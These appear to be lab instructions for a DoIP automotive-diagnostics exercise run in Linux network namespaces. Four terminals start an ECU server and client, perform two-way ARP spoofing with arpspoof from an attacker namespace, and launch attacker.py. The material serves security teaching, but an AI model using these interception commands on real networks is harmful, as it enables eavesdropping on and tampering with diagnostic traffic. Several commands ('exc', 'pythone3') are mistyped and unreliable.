Create Network:
sudo ./setup_doip_lab.sh

++++++++++TERMINAL 1++++++++++++
sudo ip netns exc ecuC bash
Run this command inside the ecuC names space:
source venv/bin/activate
python3 ecu_c_doip_server.py

++++++++++TERMINAL 2++++++++++++
sudo ip netns exc ecuA bash
Run this command inside the ecuA namespace
source venv/bin/activate
python3 ecu_a_doip_client.py

++++++++++TERMINAL 3++++++++++++
sudo ip netns exec ecuD sysctl -w net.ipv4.ip_forward=1
sudo ip netns exec ecuD arpspoof -i vethD -t 10.0.0.10 10.0.0.20 &
sudo ip netns exec ecuD arpspoof -i vethD -t 10.0.0.20 10.0.0.10 &

++++++++++TERMINAL 4++++++++++++
sudo ip netns exc ecuD bash
Run this command inside the ecuD namespace
source venv/bin/activate
pythone3 attacker.py
